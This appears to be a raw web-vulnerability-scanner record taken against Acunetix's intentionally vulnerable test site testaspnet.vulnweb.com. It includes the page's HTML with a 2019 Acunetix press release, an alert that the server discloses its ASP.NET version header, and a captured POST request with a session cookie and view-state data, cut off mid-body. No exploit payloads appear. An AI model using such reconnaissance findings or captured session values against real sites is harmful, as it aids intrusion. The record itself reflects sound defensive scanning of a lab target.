AgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (414 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10975 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (10975 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0a